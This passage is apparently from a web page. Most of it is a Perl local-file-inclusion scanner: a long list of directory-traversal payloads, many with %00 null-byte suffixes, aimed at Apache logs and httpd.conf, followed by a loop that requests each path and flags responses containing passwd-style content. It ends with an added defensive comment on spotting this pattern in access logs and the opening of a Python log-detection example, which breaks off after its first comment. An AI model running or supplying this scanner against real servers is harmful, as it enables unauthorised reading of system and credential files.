'../../../../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../../../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../../../../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../../../../../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/apache/access_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache/access_log%00',&lt;br /&gt;
'/var/log/apache/error_log',&lt;br /&gt;
'../var/log/apache/error_log',&lt;br /&gt;
'../../var/log/apache/error_log',&lt;br /&gt;
'../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../../../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../../../../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../../../../../../../var/log/apache/error_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache/error_log',&lt;br /&gt;
'/var/log/apache/error_log%00',&lt;br /&gt;
'../var/log/apache/error_log%00',&lt;br /&gt;
'../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../../../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/apache/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache/error_log%00',&lt;br /&gt;
'/var/log/apache2/error_log',&lt;br /&gt;
'../var/log/apache2/error_log',&lt;br /&gt;
'../../var/log/apache2/error_log',&lt;br /&gt;
'../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../../../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../../../../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../../../../../../../var/log/apache2/error_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache2/error_log',&lt;br /&gt;
'/var/log/apache2/error_log%00',&lt;br /&gt;
'../var/log/apache2/error_log%00',&lt;br /&gt;
'../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache2/error_log%00',&lt;br /&gt;
'/var/log/apache2/access_log',&lt;br /&gt;
'../var/log/apache2/access_log',&lt;br /&gt;
'../../var/log/apache2/access_log',&lt;br /&gt;
'../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../../../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../../../../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../../../../../../../var/log/apache2/access_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache2/access_log',&lt;br /&gt;
'/var/log/apache2/access_log%00',&lt;br /&gt;
'../var/log/apache2/access_log%00',&lt;br /&gt;
'../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/apache2/access_log%00',&lt;br /&gt;
'/var/log/access_log',&lt;br /&gt;
'../var/log/access_log',&lt;br /&gt;
'../../var/log/access_log',&lt;br /&gt;
'../../../var/log/access_log',&lt;br /&gt;
'../../../../var/log/access_log',&lt;br /&gt;
'../../../../../var/log/access_log',&lt;br /&gt;
'../../../../../../var/log/access_log',&lt;br /&gt;
'../../../../../../../var/log/access_log',&lt;br /&gt;
'../../../../../../../../var/log/access_log',&lt;br /&gt;
'../../../../../../../../../var/log/access_log',&lt;br /&gt;
'../../../../../../../../../../var/log/access_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/access_log',&lt;br /&gt;
'/var/log/access_log%00',&lt;br /&gt;
'../var/log/access_log%00',&lt;br /&gt;
'../../var/log/access_log%00',&lt;br /&gt;
'../../../var/log/access_log%00',&lt;br /&gt;
'../../../../var/log/access_log%00',&lt;br /&gt;
'../../../../../var/log/access_log%00',&lt;br /&gt;
'../../../../../../var/log/access_log%00',&lt;br /&gt;
'../../../../../../../var/log/access_log%00',&lt;br /&gt;
'../../../../../../../../var/log/access_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/access_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/access_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/access_log%00',&lt;br /&gt;
'/var/log/error_log',&lt;br /&gt;
'../var/log/error_log',&lt;br /&gt;
'../../var/log/error_log',&lt;br /&gt;
'../../../var/log/error_log',&lt;br /&gt;
'../../../../var/log/error_log',&lt;br /&gt;
'../../../../../var/log/error_log',&lt;br /&gt;
'../../../../../../var/log/error_log',&lt;br /&gt;
'../../../../../../../var/log/error_log',&lt;br /&gt;
'../../../../../../../../var/log/error_log',&lt;br /&gt;
'../../../../../../../../../var/log/error_log',&lt;br /&gt;
'../../../../../../../../../../var/log/error_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/error_log',&lt;br /&gt;
'/var/log/error_log%00',&lt;br /&gt;
'../var/log/error_log%00',&lt;br /&gt;
'../../var/log/error_log%00',&lt;br /&gt;
'../../../var/log/error_log%00',&lt;br /&gt;
'../../../../var/log/error_log%00',&lt;br /&gt;
'../../../../../var/log/error_log%00',&lt;br /&gt;
'../../../../../../var/log/error_log%00',&lt;br /&gt;
'../../../../../../../var/log/error_log%00',&lt;br /&gt;
'../../../../../../../../var/log/error_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/error_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/error_log%00',&lt;br /&gt;
'/var/www/logs/error_log',&lt;br /&gt;
'../var/www/logs/error_log',&lt;br /&gt;
'../../var/www/logs/error_log',&lt;br /&gt;
'../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/error_log',&lt;br /&gt;
'/var/www/logs/error_log%00',&lt;br /&gt;
'../var/www/logs/error_log%00',&lt;br /&gt;
'../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/error_log%00',&lt;br /&gt;
'/var/www/logs/access_log',&lt;br /&gt;
'../var/www/logs/access_log',&lt;br /&gt;
'../../var/www/logs/access_log',&lt;br /&gt;
'../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/access_log',&lt;br /&gt;
'/var/www/logs/access_log%00',&lt;br /&gt;
'../var/www/logs/access_log%00',&lt;br /&gt;
'../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/www/logs/access_log%00',&lt;br /&gt;
'/usr/local/apache/logs/error_log',&lt;br /&gt;
'../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/logs/error_log',&lt;br /&gt;
'/usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/logs/error_log%00',&lt;br /&gt;
'/var/log/httpd/access_log',&lt;br /&gt;
'../var/log/httpd/access_log',&lt;br /&gt;
'../../var/log/httpd/access_log',&lt;br /&gt;
'../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../../../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../../../../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../../../../../../../var/log/httpd/access_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/httpd/access_log',&lt;br /&gt;
'/var/log/httpd/access_log%00',&lt;br /&gt;
'../var/log/httpd/access_log%00',&lt;br /&gt;
'../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/httpd/access_log%00',&lt;br /&gt;
'/var/log/httpd/error_log',&lt;br /&gt;
'../var/log/httpd/error_log',&lt;br /&gt;
'../../var/log/httpd/error_log',&lt;br /&gt;
'../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../../../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../../../../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../../../../../../../var/log/httpd/error_log',&lt;br /&gt;
'../../../../../../../../../../../var/log/httpd/error_log',&lt;br /&gt;
'/var/log/httpd/error_log%00',&lt;br /&gt;
'../var/log/httpd/error_log%00',&lt;br /&gt;
'../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../../../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../../../../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'../../../../../../../../../../../var/log/httpd/error_log%00',&lt;br /&gt;
'/usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'/usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'/usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'/usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'/etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../etc/httpd/conf/httpd.conf',&lt;br /&gt;
'/etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../etc/httpd/conf/httpd.conf%00',&lt;br /&gt;
'/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../etc/apache/conf/httpd.conf',&lt;br /&gt;
'/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'/usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',&lt;br /&gt;
'/usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',&lt;br /&gt;
'/etc/apache2/httpd.conf',&lt;br /&gt;
'../etc/apache2/httpd.conf',&lt;br /&gt;
'../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../../../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../etc/apache2/httpd.conf',&lt;br /&gt;
'/etc/apache2/httpd.conf%00',&lt;br /&gt;
'../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../etc/apache2/httpd.conf%00',&lt;br /&gt;
'/usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',&lt;br /&gt;
'/usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',&lt;br /&gt;
'/usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',&lt;br /&gt;
'/usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',&lt;br /&gt;
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00');&lt;br /&gt;
print "&amp;gt;start scanning[...]\n";&lt;br /&gt;
&lt;br /&gt;
# One user agent for the whole run; each candidate path is appended to the base URL.&lt;br /&gt;
$useragent = LWP::UserAgent-&amp;gt;new();&lt;br /&gt;
foreach $scan(@vuls){&lt;br /&gt;
$url = $link.$scan;&lt;br /&gt;
$request = HTTP::Request-&amp;gt;new(GET=&amp;gt;$url);&lt;br /&gt;
$response = $useragent-&amp;gt;request($request);&lt;br /&gt;
# A hit is a successful response whose body contains /etc/passwd-style content, the only signature this script checks.&lt;br /&gt;
if ($response-&amp;gt;is_success &amp;amp;&amp;amp; $response-&amp;gt;content =~ /root:x:/) { $msg = "LFI PRESENT!";}&lt;br /&gt;
else { $msg = "Not Found";}&lt;br /&gt;
print "$scan..........[$msg]\n";&lt;br /&gt;
}&lt;br /&gt;
#EOF
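From the defender's side, the request pattern this script generates (the same file name tried at every traversal depth, with and without a trailing %00) is easy to spot in web server logs. The following Python is an added example written for this page, not code from the original post: it parses Apache access-log lines, percent-decodes each request target, flags the traversal, null-byte and sensitive-file indicators drawn from the path list above, and counts flagged requests per client. The log lines are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample Apache access-log lines (Common Log Format); not real traffic.
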